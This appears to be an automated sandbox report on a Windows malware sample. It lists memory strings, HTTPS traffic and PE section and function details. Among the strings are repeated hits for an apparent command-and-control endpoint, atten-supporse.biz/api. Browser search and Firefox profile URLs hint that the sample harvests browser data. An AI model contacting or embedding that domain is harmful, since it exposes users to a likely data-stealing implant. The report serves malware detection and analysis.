Source: file.exe, 00000000.00000003.2080931138.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058959258.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237778517.00000000019AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081779151.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156812212.000000000195D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236118925.00000000019A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftyo;
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2132681260.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080931138.000000000195D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/(/
Source: file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz//
Source: file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/8/
Source: file.exe, 00000000.00000003.2080931138.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081779151.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.0000000001999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/Cg3
Source: file.exe, 00000000.00000003.2233473496.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179552864.00000000019C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237946464.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183926336.00000000019BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196984088.00000000019C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/Uidlye;
Source: file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/X/
Source: file.exe, 00000000.00000003.2197033683.00000000019D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237279551.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159575392.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.000000000195D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235929559.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059041267.0000000001944000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159595354.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080931138.000000000195D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: file.exe, 00000000.00000003.2132681260.000000000195D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api.
Source: file.exe, 00000000.00000002.2237279551.00000000018EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api5
Source: file.exe, 00000000.00000003.2235929559.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apie
Source: file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apim
Source: file.exe, 00000000.00000003.2235929559.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apis
Source: file.exe, 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiuG
Source: file.exe, 00000000.00000003.2159875964.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159575392.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159595354.00000000019C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiye;
Source: file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/p(
Source: file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49710 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D86170	0_2_00D86170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6E2A9	0_2_00D6E2A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8C6D7	0_2_00D8C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9E690	0_2_00D9E690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D687F0	0_2_00D687F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6A960	0_2_00D6A960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D76B7E	0_2_00D76B7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D96C40	0_2_00D96C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D70FD6	0_2_00D70FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D96F90	0_2_00D96F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D833A0	0_2_00D833A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D815F0	0_2_00D815F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D697B0	0_2_00D697B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D99B90	0_2_00D99B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9DCF0	0_2_00D9DCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8BFDA	0_2_00D8BFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8BFD3	0_2_00D8BFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D980D9	0_2_00D980D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E240E5	0_2_00E240E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EBE0E1	0_2_00EBE0E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB60FC	0_2_00EB60FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E320D7	0_2_00E320D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAE0D3	0_2_00EAE0D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA00AC	0_2_00EA00AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED60A7	0_2_00ED60A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB20BC	0_2_00EB20BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D880B0	0_2_00D880B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6A096	0_2_00E6A096
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC6099	0_2_00EC6099
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCE0A3	0_2_00DCE0A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E5A06B	0_2_00E5A06B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1C076	0_2_00E1C076
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3C074	0_2_00E3C074
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF2046	0_2_00DF2046
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC6077	0_2_00DC6077
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D6E06A	0_2_00D6E06A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D85F7D	0_2_00D85F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1205C	0_2_00E1205C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E5C029	0_2_00E5C029
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDA009	0_2_00DDA009
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9A030	0_2_00D9A030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3601F	0_2_00E3601F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E161E6	0_2_00E161E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D901D0	0_2_00D901D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2E1EC	0_2_00E2E1EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC61FA	0_2_00EC61FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF61C3	0_2_00DF61C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDE1F8	0_2_00DDE1F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E401C1	0_2_00E401C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D681F0	0_2_00D681F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA81CD	0_2_00EA81CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFC1F4	0_2_00DFC1F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E1D7	0_2_00E4E1D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA61D0	0_2_00EA61D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9E1D5	0_2_00E9E1D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E201BE	0_2_00E201BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3819C	0_2_00E3819C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DDC156	0_2_00DDC156
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E5E140	0_2_00E5E140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8E140	0_2_00E8E140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7C157	0_2_00E7C157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E72152	0_2_00E72152
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDA158	0_2_00EDA158
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8A100	0_2_00D8A100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2610C	0_2_00E2610C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE8131	0_2_00DE8131
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA2119	0_2_00EA2119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD2129	0_2_00DD2129
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3E118	0_2_00E3E118
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDC2FC	0_2_00EDC2FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3A2F1	0_2_00E3A2F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9C2EF	0_2_00F9C2EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9E2C0	0_2_00D9E2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E962F2	0_2_00E962F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC82CF	0_2_00EC82CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD02F9	0_2_00DD02F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7E2A2	0_2_00E7E2A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E602AF	0_2_00E602AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB42A0	0_2_00EB42A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4629D	0_2_00E4629D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE82A4	0_2_00DE82A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB626B	0_2_00EB626B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1E263	0_2_00E1E263
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E62262	0_2_00E62262
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0A269	0_2_00E0A269
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC0261	0_2_00EC0261
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E54241	0_2_00E54241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D64270	0_2_00D64270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D82270	0_2_00D82270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D66200	0_2_00D66200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E82230	0_2_00E82230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0023A	0_2_00E0023A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE0234	0_2_00EE0234
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EBC230	0_2_00EBC230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2423E	0_2_00E2423E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E14209	0_2_00E14209
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4220F	0_2_00E4220F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E9821B	0_2_00E9821B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8C3EE	0_2_00E8C3EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1C3E6	0_2_00E1C3E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E943F8	0_2_00E943F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1A3F2	0_2_00E1A3F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E883CB	0_2_00E883CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E583C2	0_2_00E583C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D9A3F0	0_2_00D9A3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7A3C9	0_2_00E7A3C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E303A1	0_2_00E303A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA43BD	0_2_00EA43BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC2386	0_2_00EC2386
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ECC386	0_2_00ECC386
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7838C	0_2_00E7838C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3636A	0_2_00E3636A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCC357	0_2_00DCC357
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E52369	0_2_00E52369
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1037D	0_2_00E1037D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E34346	0_2_00E34346
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7C360	0_2_00D7C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E08358	0_2_00E08358
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED0355	0_2_00ED0355
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3C331	0_2_00E3C331
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E80331	0_2_00E80331
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2233C	0_2_00E2233C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E2830A	0_2_00E2830A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C301	0_2_00F1C301
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB24FA	0_2_00EB24FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFA4C0	0_2_00DFA4C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC64F6	0_2_00DC64F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E4CF	0_2_00E4E4CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8E4C5	0_2_00E8E4C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DC84E4	0_2_00DC84E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA04AB	0_2_00EA04AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE2495	0_2_00DE2495
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E5A49C	0_2_00E5A49C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4C49F	0_2_00E4C49F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EAC44B	0_2_00EAC44B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEE477	0_2_00DEE477
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD4467	0_2_00DD4467
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCE409	0_2_00DCE409
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DE0408	0_2_00DE0408
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DEA439	0_2_00DEA439
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D96430	0_2_00D96430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F345F9	0_2_00F345F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDA5E7	0_2_00EDA5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E025F8	0_2_00E025F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E6A5C9	0_2_00E6A5C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E405D0	0_2_00E405D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ECE5AA	0_2_00ECE5AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF458E	0_2_00DF458E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF658D	0_2_00DF658D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8A59C	0_2_00E8A59C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3059B	0_2_00E3059B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDE56D	0_2_00EDE56D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC656F	0_2_00EC656F
